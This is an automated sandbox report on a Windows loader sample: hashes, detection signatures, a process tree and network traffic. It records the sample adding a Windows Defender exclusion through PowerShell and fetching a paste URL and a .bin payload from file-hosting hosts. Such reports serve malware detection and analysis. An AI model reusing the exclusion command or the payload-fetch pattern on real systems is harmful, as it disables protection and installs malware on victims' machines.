Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9K25QyJ4hA.exe

Overview

General Information

Sample name:9K25QyJ4hA.exe
renamed because original name is a hash value
Original sample name:b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2.exe
Analysis ID:1356250
MD5:7e658759b69b246757803baf9f776a60
SHA1:6e1304c6539500ba0100327ac64858c25639387c
SHA256:b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2
Tags:exe
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 9K25QyJ4hA.exe (PID: 6780 cmdline: C:\Users\user\Desktop\9K25QyJ4hA.exe MD5: 7E658759B69B246757803BAF9F776A60)
    • powershell.exe (PID: 6968 cmdline: powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 6560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 2440 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 9K25QyJ4hA.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\9K25QyJ4hA.exe" MD5: 7E658759B69B246757803BAF9F776A60)
    • powershell.exe (PID: 7576 cmdline: powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 7836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 2408 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 9K25QyJ4hA.exe (PID: 7964 cmdline: "C:\Users\user\Desktop\9K25QyJ4hA.exe" MD5: 7E658759B69B246757803BAF9F776A60)
    • powershell.exe (PID: 7988 cmdline: powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 5956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7964 -s 2416 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 9K25QyJ4hA.exeAvira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: 9K25QyJ4hA.exeReversingLabs: Detection: 29%
Machine Learning detection for sample
Source: 9K25QyJ4hA.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: 9K25QyJ4hA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2406232584.00000000067FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb3 source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: HPko0C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdbE source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbX source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdbj source: WERD675.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdba source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbVy source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbDc source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: loadermode32bit get from pastein.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb6 source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000E23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\9K25QyJ4hA.PDB source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P:P ,P_CorExeMainmscoree.dll source: 9K25QyJ4hA.exe
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb( source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbGs source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe
Source: Binary string: mscorlib.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbB source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdbC source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\loadermode32bit get from pastein.pdbpdbein.pdb< source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbhh source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbc source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbm source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: %%.pdb)s( source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbL} source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdbTzIs source: WERB65A.tmp.dmp.23.dr
Source: Binary string: System.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: @wo.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: osymbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbL}ll source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2323897269.00000000063B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbL0vw# source: WERD675.tmp.dmp.32.dr
Source: Binary string: System.Configuration.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\System.pdb source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdbTzIs source: WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb/ source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb5y source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2323897269.00000000063C4000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb) source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P source: 9K25QyJ4hA.exe, 00000000.00000000.1216864322.00000000006C2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdbl source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4 source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdbH source: WERD675.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.pdb4 source: WER9219.tmp.dmp.7.dr
Source: Binary string: symbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: oxg|HPko0C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb7 source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: global trafficHTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 5.253.86.15 5.253.86.15
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: paste.fo
Source: powershell.exe, 00000013.00000002.1439367542.00000000070E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.1328832036.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1434744810.000000000577B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.at
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.atd
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027E4000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.fo
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027E4000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.fod
Source: powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1325694764.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004862000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1325694764.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004711000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.0000000004381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1325694764.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004862000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1325694764.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.0000000004381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002806000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C88000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/somenonymous/OshiUpload
Source: powershell.exe, 00000002.00000002.1328832036.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1434744810.000000000577B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002810000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
Source: 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/tqJAc/blueloqder.bin
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.fo
Source: 9K25QyJ4hA.exeString found in binary or memory: https://paste.fo/raw/015dbe46ef97
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002799000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/015dbe46ef97T
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
